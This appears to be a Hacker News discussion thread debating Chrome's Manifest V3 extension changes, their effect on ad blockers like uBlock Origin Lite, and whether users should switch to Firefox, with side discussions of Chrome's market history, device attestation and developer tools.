Linux would have a fight chance with better hardware/software support but dev/manufacturers can be arsed because it's a chicken and egg problem (there are also too many variations of what is Linux, so that doesn't help).
With the iPhone success, Apple had a chance to gain market share for "real" computer in a way that would have long lasting effect both for business and consumer support, instead they went full greed mode and found many clever ways to close even more a platform that was already not the most open, while had the same time selling weak computer that are clearly lacking for the price, very often with terrible engineering decision (like their new Apple Silicon iMac, already having issues, less than 4 years after release, what a joke).
> All we have to do is get the tech nerds to stop using Chrome. Chrome can't survive forever if the nerds stop using Chrome, if we stop optimizing our web pages specifically for Chrome, and if we stop writing and maintaining extensions for it.
Agreed 100% with this.
Meh, the "slightly abrasive" stuff Mozilla is doing is stuff like buying up ad analytics companies and adding features to help ad tracking companies track users. Fuck Mozilla, and fuck Google even more.
I admire your optimism by the way that a few technologists saying "stop using Chrome, Google is evil, use Firefox" is enough to overcome the market dominance of a monopoly like Google's, but I sadly don't share it. People have been saying it (and similar things, like "don't use Windows, Microsoft is evil, use Linux") for decades with little success. Even the few people who do get swayed will switch back after a few instances of "I was late for my important meeting/was unable to open this important document because the website didn't work with Firefox".
Most people's tech choices are deeply pragmatic and based on familiarity. And to expect anything else is honestly foolish, in my opinion.
This is coming from a Firefox and Linux user by the way.
>"stop using Chrome, Google is evil, use Firefox" is enough to overcome the market dominance of a monopoly like Google's
That is exactly how Firefox slew Internet Explorer.
I was going to make a joke about giving Firebug a look but (TIL) Firefox's Devtools actually subsumed Firebug a few years back. That's pretty cool and a nice note for that project to end on.
https://getfirebug.com
They make it sound nice, but the last release of Firebug was after that page says they were unified, and only about half a year before Firefox Quantum removed XUL, which would have killed Firebug anyway. I was still using Firebug because its console was still better than the built-in devtools.
IMO they are still not as good although they have improved. I just develop in chrome and use Firefox for everything else.
I use a little `chrome-new` script to develop (and sometimes take video calls or use buggy apps) against a totally clean fresh Chrome profile, then I use Firefox with uBlock Origin and uMatrix for daily driving.
The first line lets me override which Chrome version I launch if I want to try instead google-chrome-stable or google-chrome-beta for example. I keep them all installed from the AUR on Arch.I prefer this way. Much simpler but way more aggressive:
`export HOME=$TMPDIR chrome <args...>`
Will make chrome think that $TMPDIR is $HOME. Keep in mind that means your downloads for example would also be deleted after the rm -rf
This works for most other software too
Better just use 'HOME=$TMPDIR chrome <args... > without the export. With export the Home variable will persist for the current shell, potentially leading to unwanted results.
Right correct. I put this in a script hence the export. Though its probably not necessary as well.
What makes them less good? I'm used to Firefox and while the Chrome devtools have more features they're harder to use (eg smaller touch targets, can't accept JS suggestion with enter key)
I use FF and my coworker uses Chrome. He says the thing that pisses him off the most when watching me use FF is that there is no fuzzy search when manually applying styles. I.e. you have to search "justif..." to see "justify-self". You can't just search "self". That's the only example I've really noticed between the two but I'm sure there are more. It doesn't bother me enough to change though.
I know chrome dev tools are capable, but to me they feel much more dumb and convoluted. There's lots of convenience and golden nuggets in Firefox dev tools that makes you feel they've been designed by and for developers.
My needs for webdev debugging have always been satisfied by Firefox, but last time I was really in the weeds ~4 years ago I had the feeling both it and Chrome were still missing things I took for granted with Firebug long ago.
I don't mind nice and powerful tools, but one thing I learned with Java (where the tools are so much nicer and so much more powerful) is that if you're leaning on them heavily, that's kind of a sign you've messed up. Like on the scale of severity (https://raw.githubusercontent.com/matthiasn/talk-transcripts...), at least as severe as really bad coupling or brittleness. Thank goodness for the tools that let people efficiently figure things out and get on with things, but it's really better to have not needed to be in such a situation to begin with.
I have a similar view with valgrind -- amazing tool everyone would rather exist than not, one could imagine a "Google Valgrind" and "Mozilla Valgrind" competing on mild differences of amazing, but really, life is better if you can just use a managed language and never have to deal with any flavor of valgrind. I think there are ways to do webdev that significantly reduce the need to use any browser dev tools at all, though the domain necessitates some use. ClojureScript in 2014 was showing the way.
Same. I use Chromium for dev and firefox for browsing
their dev environment is still pretty bad
Have you seen Mozilla leadership team though? That is something else altogether.
Hopefully this is the inflection point for Chrome. Despite all their made-up "security" reasons, everyone knows this is solely about making adblock less effective. For many users, adblock is what makes chrome bearable - and if they make it unbearable, then those users will leave. Slowly but surely.
Google seems much too sure of itself making this change. I hope their arrogance pays off just the same as Microsoft's did with IE.
Agreed on hoping this is the inflection point, but only partial agreement that it's about adblock. For sure Google wants adblock to die, but I think it goes even deeper than that.
I think it's part of a much bigger trend in tech in general but also in Google: Removing user control. When you look at the "security" things they are doing, many of them have a common philosophy underpinning them that the user (aka device owner) is a security threat and must be protected against. Web integrity, Manifest v3, various DoH/DoT, bootloader locking, device integrity which conveniently makes root difficult/impossible, and more.
To all the engineers working on this stuff, I hope you're happy that your work is essentially destroying the world that you and I grew up in. The next generation won't have the wonderful and fertile computing environment that we enjoyed, and it's (partly) your fault.
It is important, I think, to understand that personal computing is just one part of the picture. "Enterprise" environments (governments, businesses, large organizations, etc.) have demanded many of these "features" even before Google started implementing them. Your workplace, by and large, does not want you, the replaceable person who happens to be sitting at the keyboard, to be in full control of the device that they own and which is connected to their network. Often this is made more explicit by the device just being a "thin client" or other totally locked down narrow viewport to some other computer you can't even touch. It sucks and the general trend of workplaces trusting their employees less and less has been demeaning and degenerative to the point of often fostering self-fulfilling prophecies of mistrust (don't trust anyone => get untrustworthy people => bad things happen => don't trust anyone => ...).
However, it is important to also understand that the employee is not the only stakeholder. Government agencies answer to legislators, nonprofit management answer to donors, corporate management answer to investors, etc. There are layers of compliance that must be considered as well (internal policies, external regulations, different insurance costs, etc.). It is unsurprising that these fewer but generally deep-pocketed entities have an outsized influence on the market compared to more numerous but less moneyed end users. If you refuse to serve the former, you may quickly find yourself out of business.
Then they could have made Mv3 an option to turn on by sysadmins who lock down their browsers. If you aren’t locking down your users browsers then that’s on you. I mean at worst they could have made mv2 opt-in and most people would have highly curtailed their complaints of “I’ll jump ship to _____________” . People don’t like it when features are removed especially when there are viable alternatives like, adding a special tier of review to get mv2 approval for your extension, opt-in/out as discussed, easy access by sysadmins to turn it on/off. Instead google pulled a bully “so, pencil-neck, what are you gonna do about it?” instead. They are tone-deaf and see themselves as the new 800lb silverback on the block.
I was mostly commenting on the "broader trend" aspects and the assignment of primary blame to implementing engineers.
There's another problem with Chrome, which is that nobody is actually paying for it. So the big corps move features along there only in the sense that they won't adopt it or will drop it otherwise. I don't think the big corps are pushing for Mv3 but they also probably don't care that it arrives either. Conversely, I wager Google estimates nearly nobody will revolt and leave Chrome over the loss of Mv2. It hurts ad-blocker developers and it hurts the most conscious users, but Chrome is a marketing product targeted at mass adoption first and foremost. I personally hope their estimation is wrong and the current browser monopoly breaks, but this may not yet be the breaking point.
Even if that happens, Chrome eagerly adopting enterprise policy support may keep it on life support in that environment, though.
Well to some extent they did make it Mv3 an option, not forever but for an extra few months, with that enterprise policy flag. Enterprises used their weight to demand not a more secure browser, but an extra flag to allow them to keep running old software longer. Enterprises too are treated as a security threat by Google, who still plans to depreciate Mv2 format, forcing them to move to "more secure" extensions.
Ironically, the FBI recommends using an ad blocker: https://news.ycombinator.com/item?id=41483581
A lot of enterprises run MITM on all HTTPS connections and can just block the ad-serving domains or even remove the ads from the page without any help from the browser. Ad blocker extensions are a low-infrastructure solution that's more useful for home users and small companies.
> It sucks and the general trend of workplaces trusting their employees less and less
You get what you pay for. Seeing that employee retention is frowned upon.
The technologies themselves are mostly a good idea. The problem is that the companies designing them also like to abuse them.
Take, for example, hardware attestation on android. There's not really any serious issue with this feature, it can be used to ensure your device is not compromised. This is for example how GrapheneOS enables its use with the auditor application.
But, on the other hand, Google abuses the feature to ensure that you are running a google signed OS if you want to use Google Pay. Meanwhile you can use banking apps which also use hardware attestation (although, from their perspective, they don't use enough of it to ensure it isn't being spoofed, and even then...) without any problem on GOS. Moreover, before Google Pay completely killed all of its competition, it was possible to even find third party banks which would provide you with the ability to pay with your phone without using google pay.
Likewise, secure boot is a great concept if you want to be more sure about the integrity of your laptop throughout its lifetime. But some companies have abused it to force you to use Windows. If you want to set up your own signing keys for secure boot, you end up having to deal with poorly managed UEFI keys from third parties which weaken the security of your machine. The feature, as it's implemented, is rarely designed with helping end user's secure their machines. But the core of the design is fine.
I think limiting root on a phone is also a really good idea, the issue is that Google likes to give themselves and their "system apps" special privileges. If APIs were exposed to allow you to bless your own applications with the right permissions, you would probably not care so much about root restrictions.
So all in all, fundamentally, most of these features are fine. They're genuinely great for security. But the main problem is how they're abuse by the companies in control and how little effort is put into allowing power-users to use those features for their own benefit.
No disagreement here, although if past experience has proven anything I think it's that companies will abuse whatever "security features" they can to accomplish their objectives. It reminds me a lot of the old adage, "the same wall can keep people in just like it can keep people out."
When the OS is fundamentally in the user's control, they are limited in what they can do, but when the OS disregards it's owners preferences/desires and enforces it's creators desires.
Minor thing actually:
> If APIs were exposed to allow you to bless your own applications with the right permissions, you would probably not care so much about root restrictions.
I absolutely agree with this in theory, but in practice I'm not sure it would ever work because they just aren't going to put in the work to build and maintain APIs for things they don't care about, and there would be a very long tail of things to do (and sometimes those things are legitimately a lot of work). Call recording being a classic example.
But all in all, I very much agree. I love those features when they are in my control on my devices. Biggest issue is, they virtually never are and the number of occurences is trending down.
Anyway,
> I absolutely agree with this in theory, but in practice I'm not sure it would ever work because they just aren't going to put in the work to build and maintain APIs for things they don't care about, and there would be a very long tail of things to do (and sometimes those things are legitimately a lot of work). Call recording being a classic example.
I thought about this a bit and I think that at the end of the day, the entire OS is just a bunch of these APIs. And I do think there's even a market for these APIs, they just don't want to set that precedent, I don't think it has anything to do with it being a lot more work than anything else they expose. They already have some very privileged APIs you can bless some apps (e.g. think of MDM) except not for everything and in the case of the MDM APIs it's very difficult to use it as a normal end-power-user.
> To all the engineers working on this stuff, I hope you're happy that your work is essentially destroying the world that you and I grew up in.
I recently quit my job, developing among others the means to "protect" media using DRM. While this was not a primary motivation, I'm glad to somewhat clean my hands.
The technology (dubbed Common Encryption) is a bunch of smoke and mirrors that a childishly easy to hack around. Yet clearly aimed against good faith consumers.
That's a good job - people who don't like DRM (you) get more money, and the bad DRM is a distraction that delays the implementation of good DRM.
> To all the engineers working on this stuff, I hope you're happy that your work is essentially destroying the world that you and I grew up in.
That was a world where the user base was much more limited and devices were less capable. Now we have children, grandparents, educated, and uneducated users with access to web connected devices. These devices now contain everything about you. Compromise of a device can destroy someone’s life.
Not only that, but compromise of a device can cause collateral damage to other devices on the same network.
We now have to cater to every user. Not just to the technologically adept. Look at what people believe on social media. The bar is so low to con people into compromising their device.
The problem is one of balance.
Write insecure software and you'll get screwed by hackers. Write secure locked down software nobody can touch or modify, and you'll get doubly screwed by a large corporation that wants to pound every penny they can out of your bloody corpse, upto the point your device is compromised by the corporation who can do whatever they want, but you cannot tell.
There is no win situation here, there are only trade offs.
Still a shit poor pathetic excuse to screw over the userscript/grease monkey users.
The browser is called a user agent, but this shift to absolute security no matter what, no say about it is a shift to native apps, is a shift to the developer is in control, is a shift to this being Google and the sites browser, not ours, and that being done unilaterally with nearly no opt outs is the sort of mega tectonic shift that ruins this magical special unique place in software where users had some say in what was happening. We cannot pander to imagined ever worsening users forever.
It feels like the things being done in the name of security are really building an immense prison. The work being done to allow verified age and identity checking ranks up there highly in the this corals humanity, area, not giving us agency.
> Still a shit poor pathetic excuse to screw over the userscript/grease monkey users.
Tampermonkey still works fine with MV3
> We cannot pander to imagined ever worsening users forever.
The most popular software/hardware will always pander to the most users. That’s why they’re the most popular.
You can’t complain about the most popular option pandering to the most users. Well, you can complain, but you might be in the minority of the users.
> It feels like the things being done in the name of security are really building an immense prison.
I get that, but we are running so much untrusted code on our machines now. Applications that use thousands of dependencies with the hope that someone spots a bad actor.
The prohibitions against running code dynamically are quite severe. It took a long long time & there's some work to make sure userscript/contrntScript extensions aren't totally shit out of luck (after years and years of delay & nothing), but whole domains of extension - anything where you run code on the fly - have been outlawed.
> Compromise of a device can destroy someone’s life.
So in order to prevent a hypothetical hacker bogeyman from getting our data we gladly entrust it to corporations that actively squeeze every possible cent out of it by, among other things, giving access to it to other corporations and uncountable "partners" that will feed us content with the goal of psychologically manipulating us into buying things we don't need, or thinking things someone else wants us to think, destroying the very fabric of society in the process.
I somehow find all of that delusional, our acceptance and support of it nightmarish, and trust hackers to be less diabolical in their schemes.
Computers should serve us, not the other way around. The solution to these problems is tech education, not tech babysitters.
I get why they built in all of those protections; the vast majority of tech users are not knowledgeable about the details of the stuff they use. And I think a big chunk of those that are, overestimate their own abilities, knowledge, and control. They all need to be protected against themselves.
That said, I don't like that the choice is being taken away. If you do want to tinker at that level with the technology you own, you should be given the choice. By all means make it not obvious how to get there - like, have people reboot their computers while playing Twister on their keyboards with interesting key combos, but give them the option.
yes, iOS now restricts Apps from getting blanket access to their contacts, photos, and even clipboard. On the one hand, it does protect the user from malicious Apps that trick users into giving blanket access. On the other hand, they could have atleast done it like location access - where user still has an option to give blanket access. It is not fair that Siri is the only one that can access these things now.
That's literally how iOS works today. If I go into Settings > Privacy & Security > Photos, I can give apps None, Limited Access, or Full Access. Same with Contacts, same with the clipboard (where the per-app choices are Ask, Deny, or Allow).
> It is not fair that Siri is the only one that can access these things now.
That would be true if it was, but it isn't.
It can. You can still give apps access to all of it with a single press.
And manifest v3 makes things a bit more tedious but not impossible. There are other adblockers which still function just fine
You should stop seeing the Browser as a software as a program that's controlled by the user. This idea was over when Microsoft started to display ads in the file manager program (explorer).
The modern Web Browser is an advertisement terminal. If Google would manage to eliminate having to serve content, they would certainly do it.
Their incentive is really to make the Chrome Web Store a tractable problem with minimal human effort. That's about 75% of the incentive. You can't actually make any guarantees at the CWS level regarding safety of audited code if the API allows audited code to execute non-audited code.
> To all the engineers working on this stuff, I hope you're happy that your work is essentially destroying the world that you and I grew up in.
May I be blunt? I grew up in it, so yes. I am. I was there for the Windows virus wildfires. I was there for the malware distribution schemes. I was there for the first wave of enshittification. For the dotcom crash. For the spam wars. For the search engines that didn't work. For the JavaScript injection attacks. For the world where "nobody knew you were a dog" as long as you didn't talk like yourself. I couldn't trust most of my relatives to use a computer the way we had to use them in the late '90s / early aughts. That's not a problem now.
For all its flaws, the modern system is cleaner, simpler, faster, and better for end users and no longer requires them to be super-nerds (and meanwhile, open and malleable devices are still there for the super-nerds to play with and work with). This was the goal---to make computers something that benefit everyone, not just the technorati and the priest-class.
May the past become a foreign country, hard for the modern mind to comprehend. May it always be so.
> and it's (partly) your fault
Punching down into a brutal labor environment instead of punching up into a Congress which was blatently bought off to foment this outcome? Odd choice.
I think it's part of a much bigger trend in tech in general but also in Google: Removing user control. When you look at the "security" things they are doing, many of them have a common philosophy underpinning them that the user (aka device owner) is a security threat and must be protected against.
IMHO that's actually part of an even bigger societal trend. "You will own nothing and be happy."
The ones in power want to control everyone and turn them into mindless sheeple to be exploited and milked. It's not just tech. There's another comment around here that mentions features being requested by large corporations and governments.
Adblock doesn’t only make Google Chrome bearable, it makes the internet bearable. I recently uninstalled my Adblock for testing purposes. Most websites nowadays are just ads with a little bit of text in between
I'd like to think that's true, but I don't know, because people seem to have a very high tolerance for advertisements. Surprisingly so. I have a very low tolerance, and do what I can to get rid of them. But then, every once in a while I use someone else's computer and see how they live with them. I say "I can show you how to get rid of those ads," but they usually just don't care enough to do it. I bet the majority of people are like that—maybe the vast majority—and Google is probably making the same bet, but with even more information. My prediction is that if (God willing) Chrome loses significant market share, it'll be for some other reason than this.
> Hopefully this is the inflection point for Chrome.
Here is one empirical data point.
I switched over to Firefox this morning and will advocate for it.
I've considered it for a while, but I never felt motivated to make the switch. It took me a good half hour to set it up the way I like it.
This is sort of like planting trees. I cut bait on chrome when they first announced they were dropping/impacting adblockers. For the most part, things are good enough the only time I spin up chrome is confirming something renders as expected on a personal site. Firefox works well enough for streaming and surfing.
The widespread adoption of Chrome was largely driven by word of mouth, people like you and I installing it on our friend's/relative's computers and telling them it was safer/faster/better.
Nothing stops us from doing the same thing again. I've been recommending Firefox to all my family/friends/colleagues for years (ever since I've seen the writing on the wall for Chrome). While Firefox isn't perfect, it's in a much better place than Chrome is, and meets the the needs of nearly 100% of people.
>The widespread adoption of Chrome was largely driven by word of mouth
No, it was driven by having a banner in the most privileged spot of the Internet, Google.com (the most visited site in the world with 0 ads on the homepage) saying that was faster and more secure than the alternatives. In fact Firefox benefited from some free ads on Google.com against Internet Explorer before Google developed Chromium.
The other aspect, somewhat memory-holed, was that Chrome was automatically installed as shovelware if you went to install Adobe Flash for IE or Firefox:
https://www.reddit.com/r/chrome/comments/23jnmy/why_is_chrom...
This kind of not-freely-given consent was key to Chrome's growth.
Chrome was bundled with so many installers. Google probably spent billions shoving Chrome into any machine they could.
Tellingly, that very bundling is how Sundar got into the spotlight at Google.
It was kind of both, depending on the timeline. Early on it was word of mouth, then Google saw they had momentum and they capitalized on it with the banners and aggressive marketing.
It was a long time ago but I'm 99% sure that there was a banner for Chrome on Google.com since the first public release.
So many replies in this sub thread opining authoritatively. Share your source. Did you have access to the data on Chrome's user growth and which marketing campaigns were the sources of which users?
From my perspective, all of you are saying a lot of things as if you know them to be true, but you have no idea whether they're true or not; really, you just find them to be plausible.
Is this really something particular to this thread? I feel like most comments on HN are "opining authoritatively".
They were pushing from the very start. They knew the potential of taking over the browser market share.
Early chrome was driven by the fact that firefox was a piece of garbage. Firefox 3 was not good software, and had an unpleasant habit of totally crashing the entire browser regularly. Your only other popular choice was ie8. Also not great.
Later Google's ability to buy installs and put it on google.com came into play, but for at least the first 5 years and probably longer, chrome was a far faster, more secure, and more reliable choice. They also pioneered the multi-process model to isolate different components of the browser.
… isn’t that banner an ad?
Yeah, I feel like in general we on HN give ourselves way too much credit in terms of our ability to drive public opinion or affect purchasing/usage patterns among the public. The idea of the “nerd-led revolution” may have had some impact in the past, but I think the days of that are over. Large corporations now know what they’re doing in ways that they hadn’t figured out in the 2000s or even the early 2010s.
I swear I also remember it getting included in installation wizards for unrelated software (on Windows), so people would end up with Chrome/Chromium without even realizing it.
I’ve been out of the windows game for so long I forgot all that malware that was installed by various installer engines and was so relieved when I found portable apps and oldversion.com and ninite. And now I guess there are things like chocolaty that do similar things. Switching to Mac and Linux I don’t really miss it at all
The adoption of firefox was driven by word of mouth.
I still can't search on google with them trying to shove chrome down my throat
Did you miss the barrage of ads for Chrome that google played for literally years on the internet and television?
Yes. Thanks adblock!
I'd argue it won't make a dent in Chrome market share.
People who really care about this (tech minded people) are not using Chrome anyway, others (regular people) will switch to less powerful Manifest V3 adblockers that would probably be good enough and won't switch from Chrome.
I've been checking browser stat counters religiously, looking for evidence that this change is driving their numbers down. No luck so far.
Am I missing any? https://gs.statcounter.com https://analytics.usa.gov https://www.w3counter.com
Manifest v3 changes are pretty reasonable. Declarative filtering that prevents untrustworthy software from getting access to data is objectively a good thing.
It's just that uBlock Origin is so important and trusted it should have access to everything. Truth be told it should be literally built into the browser itself and deeply integrated with it. Only conflicts of interest prevent that. Can't trust an ad company to maintain ad blockers after all.
The problem isn't the declarative filtering per se. The problem is the draconian limit on the number of filters. Given that we can compile regular expressions to DFAs and evaluate them in O(len(url)) time no matter how many patterns we have, there's little reason to place an arbitrary cap on the sophistication of an extension's filtering.
There was already an established solution for running untrusted code - the WebAssembly engine sandbox. Data can't be exfiltrated if imported functions are forbidden, which would be very easy to verify via static analysis of the WASM module. All of this hullabaloo about Manifest v3 could have been avoided if the Chrome team did the sane thing and exposed an API for using a WebAssembly module for filtering.
The vast, vast, majority of normies I know use Google Chrome and use zero extensions.
> everyone knows this is solely about making adblock less effective
I thought I knew that.
Then I switched from uBlock Origin to uBlock Origin Lite in Chrome, which is compatible with Manifest v3. I was prepared for the horrible onslaught of ads, expecting at least a quarter would start getting through, ready to switch to Firefox...
...and didn't notice a single change. Not a single ad gets through.
And at the same time, loading pages feels a little faster, though I haven't measured it.
Which has now got me wondering -- what if Manifest v3 really was about security and performance all along?
Because if Google was using it to kill adblockers, they've made approximately 0% progress towards that goal as far as I can tell. If they really wanted to kill adblockers, they'd just, you know, kill adblockers. But they didn't at all.
This is just because Google was especially insidious about how they crippled ad blockers in v3.
Adblockers do multiple things:
1. Visibly block ads from the user
2. Block the user tracking that's attached to those ads
3. Protect the user from malware
4. Save bandwidth and cpu cycles by not loading all that junk
5. Allow control to users over how a webpage is displayed to them
Arguably uBlock Origin Lite can only accomplish some of #1 and a sprinkle of #2 now. And even those abilities are compromised by artificially low limits imposed by chrome in v3 that will eventually allow ad networks to overwhelm those limits and get ads through to users.
Google is 100% boiling the frog here and you/the average user is left in the pot unaware.
I don't think any of that is accurate though.
Manifest v3 blocks user tracking -- if the request is blocked, any tracking attached to it is blocked. I'm sure it's not 100% perfect, but it's certainly working well enough in practice.
And what malware are you talking about? If a request is blocked, it's blocked. It doesn't matter if it's an ad or malware.
Manifest v3 is better at #4, because the junk isn't loaded, and the blocking is more efficient in terms of CPU.
And then #5 I don't know what you're talking about. I use Stylus and Tampermonkey to customize webpages and they continue to work great.
So I just don't see the evidence that "Google is 100% boiling the frog here". That's what everyone was saying, but now that Manifest v3 has come out, I just see adblocking that continues to work and uses less CPU to do it.
I see a lot of fearmongering around Google, but now that the results are in with Manifest v3... they just don't seem true. You're making all these claims, but I just don't see the evidence now that we're seeing how it works in practice.
Explain to me how uBlock Origin can realistically go from 100,000 to 500,000 dynamic rules down to 30k rules(only 5k of those can be dynamic) in the Lite version without losing the ability to actually block everything?
These limits are easy targets for ad networks to overwhelm or outmaneuver.
Everyone was saying that the new API is less capable than the old API at blocking things. DeclarativeNetRequest IS less capable; that's just a fact.No one was saying that adblockers would literally stop working, so it's beyond disingenuous to dismiss people's issues with these changes by just saying 'works for me'.
What evidence would you actually accept anyway? Do you need a leaked internal document from Google saying literally 'devs, go neuter adblockers' before you believe Google might have bad intentions surrounding people's ability to block ads and tracking?
If security and performance were the actual driving forces of DeclarativeNetRequest, then they would have simply added it in addition to the existing webRequest block functionality. uBlock Origin and most extensions would have happily moved the majority of their rules to the static list if it meant better performance and privacy while keeping around the webRequest blocks for the things that actually need it.
Google has gone from having only one nuclear-level option for influencing adblockers (aka delisting) to now having its boot softly pressed against their necks and plenty of levers to pull. And you want me to look at that and go, 'There's no direct evidence of malicious intention there... so perfectly normal and/or acceptable behavior by the world's biggest ad company'?
> Explain to me how uBlock Origin can realistically go from 100,000 to 500,000 dynamic rules down to 30k rules(only 5k of those can be dynamic) in the Lite version without losing the ability to actually block everything?
I will take this one.
First, your limits are out of date. The static minimum is 30k, but can now escalate to an order of magnitude higher depending on how many extensions are installed. The dynamic limit is now 30k, of which at most 5k can be "unsafe". Source: https://developer.chrome.com/docs/extensions/reference/api/d...
Second, even if the limits were correct: consider the possibility that 99% of those rules are irrelevant, out of date garbage that blocks nothing anymore but haven't been removed because there is neither process nor incentive on the extension dev's part to do so.
Ad uses pattern. UBO adds matching pattern. Ad switches to new pattern. Cat and mouse.
This happens widely, rapidly, and on an ongoing basis. The result is that the rule set is large and grows rapidly, but very little of it is actually useful day to day. From the user's perspective, the only cost is that the browser very slowly gets continually less performant, which they will not attribute to the extension.
This isn't hypothetical. I'm on the Chrome team. We analyzed the rule set contents. This is why we proposed the initial limits we did: they were plenty large enough to allow all the extensions we analyzed to do everything they actually wanted to do, if only you stripped the cruft.
The rule size increases since then primarily come out of a dialog process with ad blocking devs about their process and needs and what they see in the wild coupled with what we think we can manage to keep performant. There are compromises. I'm not on that team so I can't speak to details. But it's part of an honest attempt to have a dialog.
There are usually simple explanations for things, if people were truly willing to consider them without bias.
Google lifting the arbitrary rule count limit would go a long way towards building trust.
Thank you for providing this valuable explanation -- I haven't heard this perspective expressed elsewhere. The fact that old rules would never get deleted but continue to drain resources makes some design decisions make a lot more sense.
Now consider that the extra drain can be practically zero, and you get back to those decisions making less sense
One particularly pernicious outcome is that some ad blockers tout their rule set sizes as a feature, and users choose among blockers based on it, when if anything it is probably negatively correlated with blocker quality -- it's not necessarily a sign you're comprehensive so much as that you don't care about efficiency or cleaning up after yourself.
That's of course an oversimplification. But people who believe they're technically knowledgeable and adept are just as likely as other folks to fall for bullshit and be convinced to do things contrary to their own self interests. It's just a different type of bullshit.
No one wants to hear that, because we all want to tell ourselves that maybe everyone else is gullible, but WE'RE smart and rational. To a close approximation, though, none of us are.
> Explain to me how uBlock Origin can realistically go from 100,000 to 500,000 dynamic rules down to 30k rules(only 5k of those can be dynamic) in the Lite version without losing the ability to actually block everything?
I don't know and I don't have to. All I know is uBlock Origin Lite is still blocking everything. So it seems like 30K rules is plenty? Like it's not a meaningful difference for end users if it's blocking 99.99% vs 99.9999% of ads?
> No one was saying that adblockers would literally stop working
That's sure what it sounded like. That it would literally be so bad you'd have to switch browsers because of how degraded the experience would be.
> What evidence would you actually accept anyway?
The fact that the adblocking experience was significantly degraded for the average user -- e.g. that now 10% or 25% of ads were getting through.
> And you want me to look at that and go, 'There's no direct evidence of malicious intention there... so perfectly normal and/or acceptable behavior...
Yeah, pretty much. As far as I can tell, security and performance seem to justify the Manifest v3 changes. Occam's Razor says you don't need anything else. If you think there's malicious intention, then the onus of proof is on you.
I was told, time and time again, than Manifest v3 would result in an adblocking experience so bad that people would start switching browsers because of it, that Google was cracking down on adblockers to neuter them. Now that it's here and my adblocking works just as well, maybe even better (if it's sped up page loading times) -- then sorry, as far as I can tell the malicious intention was made-up.
> That's sure what it sounded like. That it would literally be so bad you'd have to switch browsers because of how degraded the experience would be.
> I was told, time and time again, than Manifest v3 would result in an adblocking experience so bad that people would start switching browsers because of it
Once enough ads catch up with the new limitations. Right or wrong, we're still too early for that.
uBlock lite can accomplish 2, 3, 4 completely. It's only #1 and #5 that are truly affected by v3. But those two were already pretty limited in chrominum browsers compared to firefox.
It can only accomplish #1 and #2 for 30k rules, most of which must de defined at the time of the extension release/update. As soon as that limit is exceeded an adblocker loses it's ability to accomplish #1, #2, #3, #4, or #5 effectively.
And if we are being honest about those limits, they have already been exceeded. Ublock origin is going from 100,000 to 500,000 dynamic rules to just 30k rules(only 5k of those can be dynamic) in the lite version.
Adblockers have absolutely been neutered in v3.
> ...and didn't notice a single change. Not a single ad gets through.
When I tried UBO Lite recently it couldn't block YouTube ads, not sure if that's impossible with Manifest V3, or if UBO Lite just isn't updated regularly like UBO to defeat the YouTube anti-ad-blocking updates.
Update: looks like it's fixed now, not bad :)
Youtube's adblocker-evasion and adblocker's youtube ad blocking has been a cat-and-mouse game since time immemorial.
The same Google that's currently in legal hot water for always hiding its true motivations so effectively that even lawyers can't get any relevant documents?
Haven'y tested, is it blocking youtube ads?
People seem to see what they want. And many seem to be blinded by Google hate and must find ways to be unhappy with all decisions they make. Google has publicly delayed v2 depreciation to ensure ad blockers worked well under v3.
If I remember right then the difference is more about ad-tracking/privacy than blocking. V2 allowed UBO to find and intercept the calls to the ad servers before the calls were made. Where V3+UBL still makes the calls it just doesn't display the results. So while you might not see the ads, the ads see you.
> Where V3+UBL still makes the calls it just doesn't display the results. So while you might not see the ads, the ads see you.
That's not what the docs say [1]:
Does "block" not mean block? Can you provide a source? Or am I looking at the wrong docs? I'm searching online and can't find anything that says the request is still sent.[1] https://developer.chrome.com/docs/extensions/reference/api/d...
On the contrary, MV2 used onBeforeRequest which let extensions see what requests you were making. They could then take that data and use it for malicious purposes.
MV3 doesn’t allow extensions to know what requests are being made, so extensions can’t use your data maliciously.
Requests to ads that are blocked are blocked.
I think you’re thinking of Privacy-preserving ad measurement which is an option in Firefox and Safari. https://support.mozilla.org/en-US/kb/privacy-preserving-attr...
> On the contrary, MV2 used onBeforeRequest which let extensions see what requests you were making. They could then take that data and use it for malicious purposes.
Which is something we know for a fact uBlock Origin doesn't do. It's open source, you can check the code yourself. MV3, on the other hand, doesn't do much to assure me that an addon isn't phoning home. Why not just give the user to ability to block network requests on a per-addon basis? Too difficult a task for the trillion dollar company? Or could it be that forcing users to switch to MV3 addons isn't about safety at all?
Doesn't onBeforeRequest still exist in Manifest v3? The thing that's been removed is the ability to block on it, not the ability to register handlers for requests.
It still exists, but now “ad blockers” can’t use the blocking API to record and forward metrics on hits. Ad blockers don’t even need the webRequest and webRequestBlocking permissions anymore.
Now, if an ad blocker has webRequest permissions it’s a red flag.
For example https://developer.chrome.com/docs/extensions/develop/concept... uses webRequest to send telemetry back to some remote server.
Thanks, I see how that can help.
With Manifest v3, let's say I'm an ad blocker and I want to get access to metrics not to violate privacy, but just to report them to the user (X domains blocked, Y out of Z requests blocked, etc). How would I get access to those metrics?
Separate permission for debugging only available for development essentially. https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/Web...
Otherwise, you can’t really without more invasive permissions.
https://stackoverflow.com/questions/74813523/chrome-extensio...
Oh wow, that's wild. Closing the loop on reporting things is such an important part of a trustworthy user experience.
but op wasn't talking about what extensions are seeing, but what the ad servers do. You haven't address their point at all
It makes things a bit more annoying? But in v3 you can still do everything you need to do to block ads
What makes you say the security reasons are made up?
I can take this question.
They removed webRequestBlocking, used mainly by adblockers, but left webRequest. The security implications are the same for both, but only the former is optimized for content blocking.
> making adblock less effective
adblocking still works just fine on Safari, which has been doing the same thing as Manifest V3 for years now.
Ad-blockers are not just about displaying the actual ads.
Does the Chrome blocks trackers even without ad-blocker Like Safari?
So, are you going to leave chrome then?
Yeah, I don't browse the web without an ad blocker.
Switch to a different browser! The Chrome monopoly only exists because we collectively allow it to exist.
Same with all the other google ecosystem. Gmail, maps, android. All just mechanisms for data collection and ad networks.
I hoped this day would never arrive, but alas all good things must come to an end. Since adopting uMatrix, my web experience radically changed and I can never go back to a pre-uMatrix world. With the v2 removal, I've got to eliminate Chrome from my life.
I also adopted a workflow that has been very conveninent for many years, essentially using Chrome for personal stuff and Firefox for work and other various things (especially once container support arrived!). It's not going to be easy to undo years of muscle memory, but I guess it's time to bite the bullet.
On Mac OS: https://kagi.com/orion/
From the Orion FAQ:
> Is Orion open-source?
> We’re working on it! We’ve begun with some of our components and intend to open more in the future.
